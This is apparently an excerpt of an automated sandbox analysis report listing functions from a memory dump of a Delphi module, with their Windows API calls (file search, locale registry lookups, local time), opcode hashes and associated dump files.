                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20CharClr$qqrpvFromInfoLen$qqrr20LocaleMove$qqrpxvpviStringString$qqriStringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2480292918-0
                                                                                                  • Opcode ID: f3b23d1520dd777e6de74430a20c1e1662166f9bdb97bcc231c44e790fac31a6
                                                                                                  • Instruction ID: ee238ebe49bff76439ed0bffe6765605e5bc4c903d09b655318257ab77e93168
                                                                                                  • Opcode Fuzzy Hash: f3b23d1520dd777e6de74430a20c1e1662166f9bdb97bcc231c44e790fac31a6
                                                                                                  • Instruction Fuzzy Hash: 6EE0D87170225417F7149598EC96AEAB35DD758300F4043ABBE09C7342EEB09D4043E9
                                                                                                  Function 5001BB34 Relevance: 4.5, APIs: 3, Instructions: 24fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 5001BB48
                                                                                                  • FindClose.KERNEL32(00000000,?,?), ref: 5001BB53
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,?,?), ref: 5001BB6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirstMove$qqrpxvpviSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1082176048-0
                                                                                                  • Opcode ID: 9d8fc8d053a47d63c99a6f4b7e011e5fc562af016db690a0ecbb1cefa599b471
                                                                                                  • Instruction ID: f68efd2bf0167bcec839e993e54c55a87f930c309dd978e39b41fb5caf42e4be
                                                                                                  • Opcode Fuzzy Hash: 9d8fc8d053a47d63c99a6f4b7e011e5fc562af016db690a0ecbb1cefa599b471
                                                                                                  • Instruction Fuzzy Hash: 8CE0923180858887DB20EEB48CC9ADA739CAB80320F500B52B938C31D0EBB0D99486D1
                                                                                                  Function 5001BD10 Relevance: 4.5, APIs: 3, Instructions: 23fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?), ref: 5001BD25
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 5001BD2B
                                                                                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 5001BD36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$Char$qqrx20CloseFileFirstStringSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1585263303-0
                                                                                                  • Opcode ID: 239c0e209828f38da2e02186cda94bba796cab7fda1a68a6d257b04a1d91825f
                                                                                                  • Instruction ID: a0d28535419e6d5ff69c5a3c2a29d04606291631ed661be052c53aa7cb72f55c
                                                                                                  • Opcode Fuzzy Hash: 239c0e209828f38da2e02186cda94bba796cab7fda1a68a6d257b04a1d91825f
                                                                                                  • Instruction Fuzzy Hash: 40E0C2A25096C812DF1069F96C8A79BB2CC5B44224F840BA2796CE25D2FB78899400D5
                                                                                                  Function 5000C2EC Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(59800000,?,0000020A), ref: 5000C30A
                                                                                                  • @System@LoadResourceModule$qqrpbo.RTL120(59800000,?,0000020A), ref: 5000C313
                                                                                                    • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                    • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Open$FileModuleNameQueryValue$CloseLoadModule$qqrpboResourceSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2494118284-0
                                                                                                  • Opcode ID: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                  • Instruction ID: 1d1766b6d6bdf7e2d7684c9af6fc5eeb11ad942625cb0d89418ba6028d03f5c9
                                                                                                  • Opcode Fuzzy Hash: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                  • Instruction Fuzzy Hash: B0E06D71A013508BEB04CFA8D8C1E8633D4AB08624F444A51EC14CF247D370DD1087E1
                                                                                                  Function 50025BC4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 64096e9f78111220e5717306f949647381f25a1b5c5fd3ff25ac5a1514f66389
                                                                                                  • Instruction ID: 8a847ad23c83f2510ddf9e576e5277f997b55b2555d1b1e074aea99a7d1e5b6f
                                                                                                  • Opcode Fuzzy Hash: 64096e9f78111220e5717306f949647381f25a1b5c5fd3ff25ac5a1514f66389
                                                                                                  • Instruction Fuzzy Hash: 0BD02EAA30E2A026E210415BBD42DFB46CCCBC4372F484136BA08C2102E620CC00C3B0
                                                                                                  Function 50022830 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 481472006-0
                                                                                                  • Opcode ID: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                  • Instruction ID: 603b05ba210550ab35cb675da7c298ca264b39312a6da9293f8d4f7aa50b5376
                                                                                                  • Opcode Fuzzy Hash: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                  • Instruction Fuzzy Hash: 22A012408058A101954027180C0323430409910620FC8474178FC502D1ED1D012081D7
                                                                                                  Function 5000ED44 Relevance: .4, Instructions: 397COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ab3d6a071e3239a749166a548f6c1898b499ecd4e4622bb1771b523fb6e4014
                                                                                                  • Instruction ID: cf3d65e411f67d36cb327356722faaf4ffd90df9c04122c1e780dd8bf9108d71
                                                                                                  • Opcode Fuzzy Hash: 0ab3d6a071e3239a749166a548f6c1898b499ecd4e4622bb1771b523fb6e4014
                                                                                                  • Instruction Fuzzy Hash: DAF1947150C3C29ED30F9F78D9BA462BF78AF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED4C Relevance: .4, Instructions: 394COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f68a0ee42bad41083b725cb94409a6de38f69b221a3fc83a9f099034932e1ce
                                                                                                  • Instruction ID: 623bf9785b26179497a02cefc865e4979d99708ed956c8decc308c5a69dd3a67
                                                                                                  • Opcode Fuzzy Hash: 3f68a0ee42bad41083b725cb94409a6de38f69b221a3fc83a9f099034932e1ce
                                                                                                  • Instruction Fuzzy Hash: 53E1947150C3C29ED30F9F78D9BA462BF7CAF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED54 Relevance: .4, Instructions: 391COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7795a1473a7c61111f84970f22bff7f546545ce909f46c2ed6b45f5248676fb3
                                                                                                  • Instruction ID: d357be01ad1ed8bbc4a81fdda7f73553e1ff39974d2e9d062a8c02bd88cea2d7
                                                                                                  • Opcode Fuzzy Hash: 7795a1473a7c61111f84970f22bff7f546545ce909f46c2ed6b45f5248676fb3
                                                                                                  • Instruction Fuzzy Hash: C1E1A57150C3C29ED30F9F78D97A462BF7CAF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED5C Relevance: .4, Instructions: 388COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09281ff9f0759fea031d69b3b10a7a7455a2a3da826bae2feefb939c0fecd2e0
                                                                                                  • Instruction ID: 2c2b1e8392d440b232bd510d048889bcce92fb2e970989f3d31edeb92bae1ad3
                                                                                                  • Opcode Fuzzy Hash: 09281ff9f0759fea031d69b3b10a7a7455a2a3da826bae2feefb939c0fecd2e0
                                                                                                  • Instruction Fuzzy Hash: AAE1947150C3C29ED30F9F78D97A862BF7CAF0761130A55DBD8869F0A3D2A02456DB26
                                                                                                  Function 5000ED64 Relevance: .4, Instructions: 386COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a03802ffd5065ed10c123a2a6b56796119c67b128c32b7efb3b90e385ac3e180
                                                                                                  • Instruction ID: b2146e3e37d2e4da3cf9ca4c436ff6266fd64a610200a9af604fb3da6cf7750b
                                                                                                  • Opcode Fuzzy Hash: a03802ffd5065ed10c123a2a6b56796119c67b128c32b7efb3b90e385ac3e180
                                                                                                  • Instruction Fuzzy Hash: 7AE1A47150C3C29ED30F9F78D97A462BF7CAF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED6C Relevance: .4, Instructions: 385COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 002ba549d9fbb37009a791c4e7c0c744c3e0ef08953a6269b87ae883cb7d3a02
                                                                                                  • Instruction ID: 1d158882553652dfab68dfea6998fe8ddd731fcb597efa41897c1918ae5860be
                                                                                                  • Opcode Fuzzy Hash: 002ba549d9fbb37009a791c4e7c0c744c3e0ef08953a6269b87ae883cb7d3a02
                                                                                                  • Instruction Fuzzy Hash: 2AE1957150C3C29ED30F9F78D97A462BF7CAF0761130A55DBD8869F0A3D2A06452DB26
                                                                                                  Function 5000ED74 Relevance: .4, Instructions: 381COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2938fcebdbeb12a1a55c8c6355bfb2aa37085d739ea7c214981492d367589a1f
                                                                                                  • Instruction ID: d943c7b09c133992d15b184f76b9cdbb8ddc8506f46618e3befca7a1bf030c8b
                                                                                                  • Opcode Fuzzy Hash: 2938fcebdbeb12a1a55c8c6355bfb2aa37085d739ea7c214981492d367589a1f
                                                                                                  • Instruction Fuzzy Hash: FDE1A47150C3C29ED30F9F78D97A862BF7CAF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED7C Relevance: .4, Instructions: 378COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 239d208888538ebe00c2d791575b5cd81988bbfc86e51d5946e510efe69cc01f
                                                                                                  • Instruction ID: 20c528f272a86095bb7c5ceed0ec5ded17a9c75002dbcecaefe77a1837d448a6
                                                                                                  • Opcode Fuzzy Hash: 239d208888538ebe00c2d791575b5cd81988bbfc86e51d5946e510efe69cc01f
                                                                                                  • Instruction Fuzzy Hash: 08E1A47151C3C29ED30F9F78D97A862BF7CAF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Function 5000ED84 Relevance: .4, Instructions: 374COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
